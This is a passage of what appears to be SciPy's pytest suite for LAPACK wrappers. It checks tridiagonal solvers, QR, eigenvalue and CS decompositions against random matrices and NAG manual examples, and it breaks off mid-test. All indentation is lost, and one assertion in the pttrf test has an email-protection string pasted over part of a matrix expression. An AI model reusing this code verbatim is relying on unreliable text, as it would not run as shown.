Ac = A.copy('A')
_ = gejsv(A)
assert_allclose(A, Ac)
@pytest.mark.parametrize(('kwargs'),
({'joba': 9},
{'jobu': 9},
{'jobv': 9},
{'jobr': 9},
{'jobt': 9},
{'jobp': 9})
)
def test_gejsv_invalid_job_arguments(kwargs):
"""Test invalid job arguments raise an Exception"""
A = np.ones((2, 2), dtype=float)
gejsv = get_lapack_funcs('gejsv', dtype=float)
assert_raises(Exception, gejsv, A, **kwargs)
@pytest.mark.parametrize("A,sva_expect,u_expect,v_expect",
[(np.array([[2.27, -1.54, 1.15, -1.94],
[0.28, -1.67, 0.94, -0.78],
[-0.48, -3.09, 0.99, -0.21],
[1.07, 1.22, 0.79, 0.63],
[-2.35, 2.93, -1.45, 2.30],
[0.62, -7.39, 1.03, -2.57]]),
np.array([9.9966, 3.6831, 1.3569, 0.5000]),
np.array([[0.2774, -0.6003, -0.1277, 0.1323],
[0.2020, -0.0301, 0.2805, 0.7034],
[0.2918, 0.3348, 0.6453, 0.1906],
[-0.0938, -0.3699, 0.6781, -0.5399],
[-0.4213, 0.5266, 0.0413, -0.0575],
[0.7816, 0.3353, -0.1645, -0.3957]]),
np.array([[0.1921, -0.8030, 0.0041, -0.5642],
[-0.8794, -0.3926, -0.0752, 0.2587],
[0.2140, -0.2980, 0.7827, 0.5027],
[-0.3795, 0.3351, 0.6178, -0.6017]]))])
def test_gejsv_NAG(A, sva_expect, u_expect, v_expect):
"""
This test implements the example found in the NAG manual, f08khf.
An example was not found for the complex case.
"""
# NAG manual provides accuracy up to 4 decimals
atol = 1e-4
gejsv = get_lapack_funcs('gejsv', dtype=A.dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_allclose(sva_expect, sva, atol=atol)
assert_allclose(u_expect, u, atol=atol)
assert_allclose(v_expect, v, atol=atol)
@pytest.mark.parametrize("dtype", DTYPES)
def test_gttrf_gttrs(dtype):
# The test uses ?gttrf and ?gttrs to solve a random system for each dtype,
# tests that the output of ?gttrf define LU matricies, that input
# parameters are unmodified, transposal options function correctly, that
# incompatible matrix shapes raise an error, and singular matrices return
# non zero info.
seed(42)
n = 10
atol = 100 * np.finfo(dtype).eps
# create the matrix in accordance with the data type
du = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
dl = generate_random_dtype_array((n-1,), dtype=dtype)
diag_cpy = [dl.copy(), d.copy(), du.copy()]
A = np.diag(d) + np.diag(dl, -1) + np.diag(du, 1)
x = np.random.rand(n)
b = A @ x
gttrf, gttrs = get_lapack_funcs(('gttrf', 'gttrs'), dtype=dtype)
_dl, _d, _du, du2, ipiv, info = gttrf(dl, d, du)
# test to assure that the inputs of ?gttrf are unmodified
assert_array_equal(dl, diag_cpy[0])
assert_array_equal(d, diag_cpy[1])
assert_array_equal(du, diag_cpy[2])
# generate L and U factors from ?gttrf return values
# L/U are lower/upper triangular by construction (initially and at end)
U = np.diag(_d, 0) + np.diag(_du, 1) + np.diag(du2, 2)
L = np.eye(n, dtype=dtype)
for i, m in enumerate(_dl):
# L is given in a factored form.
# See
# www.hpcavf.uclan.ac.uk/softwaredoc/sgi_scsl_html/sgi_html/ch03.html
piv = ipiv[i] - 1
# right multiply by permutation matrix
L[:, [i, piv]] = L[:, [piv, i]]
# right multiply by Li, rank-one modification of identity
L[:, i] += L[:, i+1]*m
# one last permutation
i, piv = -1, ipiv[-1] - 1
# right multiply by final permutation matrix
L[:, [i, piv]] = L[:, [piv, i]]
# check that the outputs of ?gttrf define an LU decomposition of A
assert_allclose(A, L @ U, atol=atol)
b_cpy = b.copy()
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b)
# test that the inputs of ?gttrs are unmodified
assert_array_equal(b, b_cpy)
# test that the result of ?gttrs matches the expected input
assert_allclose(x, x_gttrs, atol=atol)
# test that ?gttrf and ?gttrs work with transposal options
if dtype in REAL_DTYPES:
trans = "T"
b_trans = A.T @ x
else:
trans = "C"
b_trans = A.conj().T @ x
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b_trans, trans=trans)
assert_allclose(x, x_gttrs, atol=atol)
# test that ValueError is raised with incompatible matrix shapes
with assert_raises(ValueError):
gttrf(dl[:-1], d, du)
with assert_raises(ValueError):
gttrf(dl, d[:-1], du)
with assert_raises(ValueError):
gttrf(dl, d, du[:-1])
# test that matrix of size n=2 raises exception
with assert_raises(Exception):
gttrf(dl[0], d[:1], du[0])
# test that singular (row of all zeroes) matrix fails via info
du[0] = 0
d[0] = 0
__dl, __d, __du, _du2, _ipiv, _info = gttrf(dl, d, du)
np.testing.assert_(__d[info - 1] == 0,
"?gttrf: _d[info-1] is {}, not the illegal value :0."
.format(__d[info - 1]))
@pytest.mark.parametrize("du, d, dl, du_exp, d_exp, du2_exp, ipiv_exp, b, x",
[(np.array([2.1, -1.0, 1.9, 8.0]),
np.array([3.0, 2.3, -5.0, -.9, 7.1]),
np.array([3.4, 3.6, 7.0, -6.0]),
np.array([2.3, -5, -.9, 7.1]),
np.array([3.4, 3.6, 7, -6, -1.015373]),
np.array([-1, 1.9, 8]),
np.array([2, 3, 4, 5, 5]),
np.array([[2.7, 6.6],
[-0.5, 10.8],
[2.6, -3.2],
[0.6, -11.2],
[2.7, 19.1]
]),
np.array([[-4, 5],
[7, -4],
[3, -3],
[-4, -2],
[-3, 1]])),
(
np.array([2 - 1j, 2 + 1j, -1 + 1j, 1 - 1j]),
np.array([-1.3 + 1.3j, -1.3 + 1.3j,
-1.3 + 3.3j, - .3 + 4.3j,
-3.3 + 1.3j]),
np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j]),
# du exp
np.array([-1.3 + 1.3j, -1.3 + 3.3j,
-0.3 + 4.3j, -3.3 + 1.3j]),
np.array([1 - 2j, 1 + 1j, 2 - 3j, 1 + 1j,
-1.3399 + 0.2875j]),
np.array([2 + 1j, -1 + 1j, 1 - 1j]),
np.array([2, 3, 4, 5, 5]),
np.array([[2.4 - 5j, 2.7 + 6.9j],
[3.4 + 18.2j, - 6.9 - 5.3j],
[-14.7 + 9.7j, - 6 - .6j],
[31.9 - 7.7j, -3.9 + 9.3j],
[-1 + 1.6j, -3 + 12.2j]]),
np.array([[1 + 1j, 2 - 1j],
[3 - 1j, 1 + 2j],
[4 + 5j, -1 + 1j],
[-1 - 2j, 2 + 1j],
[1 - 1j, 2 - 2j]])
)])
def test_gttrf_gttrs_NAG_f07cdf_f07cef_f07crf_f07csf(du, d, dl, du_exp, d_exp,
du2_exp, ipiv_exp, b, x):
# test to assure that wrapper is consistent with NAG Library Manual Mark 26
# example problems: f07cdf and f07cef (real)
# examples: f07crf and f07csf (complex)
# (Links may expire, so search for "NAG Library Manual Mark 26" online)
gttrf, gttrs = get_lapack_funcs(('gttrf', "gttrs"), (du[0], du[0]))
_dl, _d, _du, du2, ipiv, info = gttrf(dl, d, du)
assert_allclose(du2, du2_exp)
assert_allclose(_du, du_exp)
assert_allclose(_d, d_exp, atol=1e-4) # NAG examples provide 4 decimals.
assert_allclose(ipiv, ipiv_exp)
x_gttrs, info = gttrs(_dl, _d, _du, du2, ipiv, b)
assert_allclose(x_gttrs, x)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('shape', [(3, 7), (7, 3), (2**18, 2**18)])
def test_geqrfp_lwork(dtype, shape):
geqrfp_lwork = get_lapack_funcs(('geqrfp_lwork'), dtype=dtype)
m, n = shape
lwork, info = geqrfp_lwork(m=m, n=n)
assert_equal(info, 0)
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs(ddtype, dtype):
seed(42)
# set test tolerance appropriate for dtype
atol = 100*np.finfo(dtype).eps
# n is the length diagonal of A
n = 10
# create diagonals according to size and dtype
# diagonal d should always be real.
# add 4 to d so it will be dominant for all dtypes
d = generate_random_dtype_array((n,), ddtype) + 4
# diagonal e may be real or complex.
e = generate_random_dtype_array((n-1,), dtype)
# assemble diagonals together into matrix
A = np.diag(d) + np.diag(e, -1) + np.diag(np.conj(e), 1)
# store a copy of diagonals to later verify
diag_cpy = [d.copy(), e.copy()]
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
_d, _e, info = pttrf(d, e)
# test to assure that the inputs of ?pttrf are unmodified
assert_array_equal(d, diag_cpy[0])
assert_array_equal(e, diag_cpy[1])
assert_equal(info, 0, err_msg="pttrf: info = {}, should be 0".format(info))
# test that the factors from pttrf can be recombined to make A
L = np.diag(_e, -1) + np.diag(np.ones(n))
D = np.diag(_d)
assert_allclose(A, L@[email protected]().T, atol=atol)
# generate random solution x
x = generate_random_dtype_array((n,), dtype)
# determine accompanying b to get soln x
b = A@x
# determine _x from pttrs
pttrs = get_lapack_funcs('pttrs', dtype=dtype)
_x, info = pttrs(_d, _e.conj(), b)
assert_equal(info, 0, err_msg="pttrs: info = {}, should be 0".format(info))
# test that _x from pttrs matches the expected x
assert_allclose(x, _x, atol=atol)
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs_errors_incompatible_shape(ddtype, dtype):
n = 10
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
d = generate_random_dtype_array((n,), ddtype) + 2
e = generate_random_dtype_array((n-1,), dtype)
# test that ValueError is raised with incompatible matrix shapes
assert_raises(ValueError, pttrf, d[:-1], e)
assert_raises(ValueError, pttrf, d, e[:-1])
@pytest.mark.parametrize("ddtype,dtype",
zip(REAL_DTYPES + REAL_DTYPES, DTYPES))
def test_pttrf_pttrs_errors_singular_nonSPD(ddtype, dtype):
n = 10
pttrf = get_lapack_funcs('pttrf', dtype=dtype)
d = generate_random_dtype_array((n,), ddtype) + 2
e = generate_random_dtype_array((n-1,), dtype)
# test that singular (row of all zeroes) matrix fails via info
d[0] = 0
e[0] = 0
_d, _e, info = pttrf(d, e)
assert_equal(_d[info - 1], 0,
"?pttrf: _d[info-1] is {}, not the illegal value :0."
.format(_d[info - 1]))
# test with non-spd matrix
d = generate_random_dtype_array((n,), ddtype)
_d, _e, info = pttrf(d, e)
assert_(info != 0, "?pttrf should fail with non-spd matrix, but didn't")
@pytest.mark.parametrize(("d, e, d_expect, e_expect, b, x_expect"), [
(np.array([4, 10, 29, 25, 5]),
np.array([-2, -6, 15, 8]),
np.array([4, 9, 25, 16, 1]),
np.array([-.5, -.6667, .6, .5]),
np.array([[6, 10], [9, 4], [2, 9], [14, 65],
[7, 23]]),
np.array([[2.5, 2], [2, -1], [1, -3], [-1, 6],
[3, -5]])
), (
np.array([16, 41, 46, 21]),
np.array([16 + 16j, 18 - 9j, 1 - 4j]),
np.array([16, 9, 1, 4]),
np.array([1+1j, 2-1j, 1-4j]),
np.array([[64+16j, -16-32j], [93+62j, 61-66j],
[78-80j, 71-74j], [14-27j, 35+15j]]),
np.array([[2+1j, -3-2j], [1+1j, 1+1j], [1-2j, 1-2j],
[1-1j, 2+1j]])
)])
def test_pttrf_pttrs_NAG(d, e, d_expect, e_expect, b, x_expect):
# test to assure that wrapper is consistent with NAG Manual Mark 26
# example problems: f07jdf and f07jef (real)
# examples: f07jrf and f07csf (complex)
# NAG examples provide 4 decimals.
# (Links expire, so please search for "NAG Library Manual Mark 26" online)
atol = 1e-4
pttrf = get_lapack_funcs('pttrf', dtype=e[0])
_d, _e, info = pttrf(d, e)
assert_allclose(_d, d_expect, atol=atol)
assert_allclose(_e, e_expect, atol=atol)
pttrs = get_lapack_funcs('pttrs', dtype=e[0])
_x, info = pttrs(_d, _e.conj(), b)
assert_allclose(_x, x_expect, atol=atol)
# also test option `lower`
if e.dtype in COMPLEX_DTYPES:
_x, info = pttrs(_d, _e, b, lower=1)
assert_allclose(_x, x_expect, atol=atol)
def pteqr_get_d_e_A_z(dtype, realtype, n, compute_z):
# used by ?pteqr tests to build parameters
# returns tuple of (d, e, A, z)
if compute_z == 1:
# build Hermitian A from Q**T * tri * Q = A by creating Q and tri
A_eig = generate_random_dtype_array((n, n), dtype)
A_eig = A_eig + np.diag(np.zeros(n) + 4*n)
A_eig = (A_eig + A_eig.conj().T) / 2
# obtain right eigenvectors (orthogonal)
vr = eigh(A_eig)[1]
# create tridiagonal matrix
d = generate_random_dtype_array((n,), realtype) + 4
e = generate_random_dtype_array((n-1,), realtype)
tri = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
# Build A using these factors that sytrd would: (Q**T * tri * Q = A)
A = vr @ tri @ vr.conj().T
# vr is orthogonal
z = vr
else:
# d and e are always real per lapack docs.
d = generate_random_dtype_array((n,), realtype)
e = generate_random_dtype_array((n-1,), realtype)
# make SPD
d = d + 4
A = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
z = np.diag(d) + np.diag(e, -1) + np.diag(e, 1)
return (d, e, A, z)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr(dtype, realtype, compute_z):
'''
Tests the ?pteqr lapack routine for all dtypes and compute_z parameters.
It generates random SPD matrix diagonals d and e, and then confirms
correct eigenvalues with scipy.linalg.eig. With applicable compute_z=2 it
tests that z can reform A.
'''
seed(42)
atol = 1000*np.finfo(dtype).eps
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d=d, e=e, z=z, compute_z=compute_z)
assert_equal(info, 0, "info = {}, should be 0.".format(info))
# compare the routine's eigenvalues with scipy.linalg.eig's.
assert_allclose(np.sort(eigh(A)[0]), np.sort(d_pteqr), atol=atol)
if compute_z:
# verify z_pteqr as orthogonal
assert_allclose(z_pteqr @ np.conj(z_pteqr).T, np.identity(n),
atol=atol)
# verify that z_pteqr recombines to A
assert_allclose(z_pteqr @ np.diag(d_pteqr) @ np.conj(z_pteqr).T,
A, atol=atol)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_error_non_spd(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with non-spd matrix
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d - 4, e, z=z, compute_z=compute_z)
assert info > 0
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_raise_error_wrong_shape(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with incorrect/incompatible array sizes
assert_raises(ValueError, pteqr, d[:-1], e, z=z, compute_z=compute_z)
assert_raises(ValueError, pteqr, d, e[:-1], z=z, compute_z=compute_z)
if compute_z:
assert_raises(ValueError, pteqr, d, e, z=z[:-1], compute_z=compute_z)
@pytest.mark.parametrize("dtype,realtype",
zip(DTYPES, REAL_DTYPES + REAL_DTYPES))
@pytest.mark.parametrize("compute_z", range(3))
def test_pteqr_error_singular(dtype, realtype, compute_z):
seed(42)
pteqr = get_lapack_funcs(('pteqr'), dtype=dtype)
n = 10
d, e, A, z = pteqr_get_d_e_A_z(dtype, realtype, n, compute_z)
# test with singular matrix
d[0] = 0
e[0] = 0
d_pteqr, e_pteqr, z_pteqr, info = pteqr(d, e, z=z, compute_z=compute_z)
assert info > 0
@pytest.mark.parametrize("compute_z,d,e,d_expect,z_expect",
[(2, # "I"
np.array([4.16, 5.25, 1.09, .62]),
np.array([3.17, -.97, .55]),
np.array([8.0023, 1.9926, 1.0014, 0.1237]),
np.array([[0.6326, 0.6245, -0.4191, 0.1847],
[0.7668, -0.4270, 0.4176, -0.2352],
[-0.1082, 0.6071, 0.4594, -0.6393],
[-0.0081, 0.2432, 0.6625, 0.7084]])),
])
def test_pteqr_NAG_f08jgf(compute_z, d, e, d_expect, z_expect):
'''
Implements real (f08jgf) example from NAG Manual Mark 26.
Tests for correct outputs.
'''
# the NAG manual has 4 decimals accuracy
atol = 1e-4
pteqr = get_lapack_funcs(('pteqr'), dtype=d.dtype)
z = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
_d, _e, _z, info = pteqr(d=d, e=e, z=z, compute_z=compute_z)
assert_allclose(_d, d_expect, atol=atol)
assert_allclose(np.abs(_z), np.abs(z_expect), atol=atol)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('matrix_size', [(3, 4), (7, 6), (6, 6)])
def test_geqrfp(dtype, matrix_size):
# Tests for all dytpes, tall, wide, and square matrices.
# Using the routine with random matrix A, Q and R are obtained and then
# tested such that R is upper triangular and non-negative on the diagonal,
# and Q is an orthagonal matrix. Verifies that A=Q@R. It also
# tests against a matrix that for which the linalg.qr method returns
# negative diagonals, and for error messaging.
# set test tolerance appropriate for dtype
np.random.seed(42)
rtol = 250*np.finfo(dtype).eps
atol = 100*np.finfo(dtype).eps
# get appropriate ?geqrfp for dtype
geqrfp = get_lapack_funcs(('geqrfp'), dtype=dtype)
gqr = get_lapack_funcs(("orgqr"), dtype=dtype)
m, n = matrix_size
# create random matrix of dimentions m x n
A = generate_random_dtype_array((m, n), dtype=dtype)
# create qr matrix using geqrfp
qr_A, tau, info = geqrfp(A)
# obtain r from the upper triangular area
r = np.triu(qr_A)
# obtain q from the orgqr lapack routine
# based on linalg.qr's extraction strategy of q with orgqr
if m > n:
# this adds an extra column to the end of qr_A
# let qqr be an empty m x m matrix
qqr = np.zeros((m, m), dtype=dtype)
# set first n columns of qqr to qr_A
qqr[:, :n] = qr_A
# determine q from this qqr
# note that m is a sufficient for lwork based on LAPACK documentation
q = gqr(qqr, tau=tau, lwork=m)[0]
else:
q = gqr(qr_A[:, :m], tau=tau, lwork=m)[0]
# test that q and r still make A
assert_allclose(q@r, A, rtol=rtol)
# ensure that q is orthogonal (that q @ transposed q is the identity)
assert_allclose(np.eye(q.shape[0]), q@(q.conj().T), rtol=rtol,
atol=atol)
# ensure r is upper tri by comparing original r to r as upper triangular
assert_allclose(r, np.triu(r), rtol=rtol)
# make sure diagonals of r are positive for this random solution
assert_(np.all(np.diag(r) > np.zeros(len(np.diag(r)))))
# ensure that info is zero for this success
assert_(info == 0)
# test that this routine gives r diagonals that are positive for a
# matrix that returns negatives in the diagonal with scipy.linalg.rq
A_negative = generate_random_dtype_array((n, m), dtype=dtype) * -1
r_rq_neg, q_rq_neg = qr(A_negative)
rq_A_neg, tau_neg, info_neg = geqrfp(A_negative)
# assert that any of the entries on the diagonal from linalg.qr
# are negative and that all of geqrfp are positive.
assert_(np.any(np.diag(r_rq_neg) < 0) and
np.all(np.diag(r) > 0))
def test_geqrfp_errors_with_empty_array():
# check that empty array raises good error message
A_empty = np.array([])
geqrfp = get_lapack_funcs('geqrfp', dtype=A_empty.dtype)
assert_raises(Exception, geqrfp, A_empty)
@pytest.mark.parametrize("driver", ['ev', 'evd', 'evr', 'evx'])
@pytest.mark.parametrize("pfx", ['sy', 'he'])
def test_standard_eigh_lworks(pfx, driver):
n = 1200 # Some sufficiently big arbitrary number
dtype = REAL_DTYPES if pfx == 'sy' else COMPLEX_DTYPES
sc_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[0])
dz_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[1])
try:
_compute_lwork(sc_dlw, n, lower=1)
_compute_lwork(dz_dlw, n, lower=1)
except Exception as e:
pytest.fail("{}_lwork raised unexpected exception: {}"
"".format(pfx+driver, e))
@pytest.mark.parametrize("driver", ['gv', 'gvx'])
@pytest.mark.parametrize("pfx", ['sy', 'he'])
def test_generalized_eigh_lworks(pfx, driver):
n = 1200 # Some sufficiently big arbitrary number
dtype = REAL_DTYPES if pfx == 'sy' else COMPLEX_DTYPES
sc_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[0])
dz_dlw = get_lapack_funcs(pfx+driver+'_lwork', dtype=dtype[1])
# Shouldn't raise any exceptions
try:
_compute_lwork(sc_dlw, n, uplo="L")
_compute_lwork(dz_dlw, n, uplo="L")
except Exception as e:
pytest.fail("{}_lwork raised unexpected exception: {}"
"".format(pfx+driver, e))
@pytest.mark.parametrize("dtype_", DTYPES)
@pytest.mark.parametrize("m", [1, 10, 100, 1000])
def test_orcsd_uncsd_lwork(dtype_, m):
seed(1234)
p = randint(0, m)
q = m - p
pfx = 'or' if dtype_ in REAL_DTYPES else 'un'
dlw = pfx + 'csd_lwork'
lw = get_lapack_funcs(dlw, dtype=dtype_)
lwval = _compute_lwork(lw, m, p, q)
lwval = lwval if pfx == 'un' else (lwval,)
assert all([x > 0 for x in lwval])
@pytest.mark.parametrize("dtype_", DTYPES)
def test_orcsd_uncsd(dtype_):
m, p, q = 250, 80, 170
pfx = 'or' if dtype_ in REAL_DTYPES else 'un'
X = ortho_group.rvs(m) if pfx == 'or' else unitary_group.rvs(m)
drv, dlw = get_lapack_funcs((pfx + 'csd', pfx + 'csd_lwork'), dtype=dtype_)
lwval = _compute_lwork(dlw, m, p, q)
lwvals = {'lwork': lwval} if pfx == 'or' else dict(zip(['lwork',
'lrwork'], lwval))
cs11, cs12, cs21, cs22, theta, u1, u2, v1t, v2t, info =\
drv(X[:p, :q], X[:p, q:], X[p:, :q], X[p:, q:], **lwvals)
assert info == 0
U = block_diag(u1, u2)
VH = block_diag(v1t, v2t)
r = min(min(p, q), min(m-p, m-q))
n11 = min(p, q) - r
n12 = min(p, m-q) - r
n21 = min(m-p, q) - r
n22 = min(m-p, m-q) - r
S = np.zeros((m, m), dtype=dtype_)
one = dtype_(1.)
for i in range(n11):
S[i, i] = one
for i in range(n22):
S[p+i, q+i] = one
for i in range(n12):
S[i+n11+r, i+n11+r+n21+n22+r] = -one
for i in range(n21):
S[p+n22+r+i, n11+r+i] = one
for i in range(r):
S[i+n11, i+n11] = np.cos(theta[i])
S[p+n22+i, i+r+n21+n22] = np.cos(theta[i])
S[i+n11, i+n11+n21+n22+r] = -np.sin(theta[i])
S[p+n22+i, i+n11] = np.sin(theta[i])
Xc = U @ S @ VH
assert_allclose(X, Xc, rtol=0., atol=1e4*np.finfo(dtype_).eps)
@pytest.mark.parametrize("dtype", DTYPES)
@pytest.mark.parametrize("trans_bool", [False, True])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx(dtype, trans_bool, fact):
"""
These tests uses ?gtsvx to solve a random Ax=b system for each dtype.
It tests that the outputs define an LU matrix, that inputs are unmodified,
transposal options, incompatible shapes, singular matrices, and
singular factorizations. It parametrizes DTYPES and the 'fact' value along
with the fact related inputs.
"""
seed(42)
# set test tolerance appropriate for dtype
atol = 100 * np.finfo(dtype).eps
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = ("T" if dtype in REAL_DTYPES else "C") if trans_bool else "N"
b = (A.conj().T if trans_bool else A) @ x
# store a copy of the inputs to check they haven't been modified later
inputs_cpy = [dl.copy(), d.copy(), du.copy(), b.copy()]
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
assert_(info == 0, "?gtsvx info = {}, should be zero".format(info))
# assure that inputs are unmodified
assert_array_equal(dl, inputs_cpy[0])
assert_array_equal(d, inputs_cpy[1])
assert_array_equal(du, inputs_cpy[2])
assert_array_equal(b, inputs_cpy[3])
# test that x_soln matches the expected x
assert_allclose(x, x_soln, atol=atol)
# assert that the outputs are of correct type or shape
# rcond should be a scalar
assert_(hasattr(rcond, "__len__") is not True,
"rcond should be scalar but is {}".format(rcond))
# ferr should be length of # of cols in x
assert_(ferr.shape[0] == b.shape[1], "ferr.shape is {} but shoud be {},"
.format(ferr.shape[0], b.shape[1]))
# berr should be length of # of cols in x
assert_(berr.shape[0] == b.shape[1], "berr.shape is {} but shoud be {},"
.format(berr.shape[0], b.shape[1]))
@pytest.mark.parametrize("dtype", DTYPES)
@pytest.mark.parametrize("trans_bool", [0, 1])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx_error_singular(dtype, trans_bool, fact):
seed(42)
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = "T" if dtype in REAL_DTYPES else "C"
b = (A.conj().T if trans_bool else A) @ x
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# test with singular matrix
# no need to test inputs with fact "F" since ?gttrf already does.
if fact == "N":
# Construct a singular example manually
d[-1] = 0
dl[-1] = 0
# solve using routine
gtsvx_out = gtsvx(dl, d, du, b)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# test for the singular matrix.
assert info > 0, "info should be > 0 for singular matrix"
elif fact == 'F':
# assuming that a singular factorization is input
df_[-1] = 0
duf_[-1] = 0
du2f_[-1] = 0
gtsvx_out = gtsvx(dl, d, du, b, fact=fact, dlf=dlf_, df=df_, duf=duf_,
du2=du2f_, ipiv=ipiv_)
dlf, df, duf, du2f, ipiv, x_soln, rcond, ferr, berr, info = gtsvx_out
# info should not be zero and should provide index of illegal value
assert info > 0, "info should be > 0 for singular matrix"
@pytest.mark.parametrize("dtype", DTYPES*2)
@pytest.mark.parametrize("trans_bool", [False, True])
@pytest.mark.parametrize("fact", ["F", "N"])
def test_gtsvx_error_incompatible_size(dtype, trans_bool, fact):
seed(42)
# obtain routine
gtsvx, gttrf = get_lapack_funcs(('gtsvx', 'gttrf'), dtype=dtype)
# Generate random tridiagonal matrix A
n = 10
dl = generate_random_dtype_array((n-1,), dtype=dtype)
d = generate_random_dtype_array((n,), dtype=dtype)
du = generate_random_dtype_array((n-1,), dtype=dtype)
A = np.diag(dl, -1) + np.diag(d) + np.diag(du, 1)
# generate random solution x
x = generate_random_dtype_array((n, 2), dtype=dtype)
# create b from x for equation Ax=b
trans = "T" if dtype in REAL_DTYPES else "C"
b = (A.conj().T if trans_bool else A) @ x
# set these to None if fact = 'N', or the output of gttrf is fact = 'F'
dlf_, df_, duf_, du2f_, ipiv_, info_ = \
gttrf(dl, d, du) if fact == 'F' else [None]*6
if fact == "N":
assert_raises(ValueError, gtsvx, dl[:-1], d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d[:-1], du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du[:-1], b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(Exception, gtsvx, dl, d, du, b[:-1],
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
else:
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_[:-1], df=df_,
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_[:-1],
duf=duf_, du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_[:-1], du2=du2f_, ipiv=ipiv_)
assert_raises(ValueError, gtsvx, dl, d, du, b,
fact=fact, trans=trans, dlf=dlf_, df=df_,
duf=duf_, du2=du2f_[:-1], ipiv=ipiv_)
@pytest.mark.parametrize("du,d,dl,b,x",
[(np.array([2.1, -1.0, 1.9, 8.0]),
np.array([3.0, 2.3, -5.0, -0.9, 7.1]),
np.array([3.4, 3.6, 7.0, -6.0]),
np.array([[2.7, 6.6], [-.5, 10.8], [2.6, -3.2],
[.6, -11.2], [2.7, 19.1]]),
np.array([[-4, 5], [7, -4], [3, -3], [-4, -2],
[-3, 1]])),
(np.array([2 - 1j, 2 + 1j, -1 + 1j, 1 - 1j]),
np.array([-1.3 + 1.3j, -1.3 + 1.3j, -1.3 + 3.3j,
-.3 + 4.3j, -3.3 + 1.3j]),
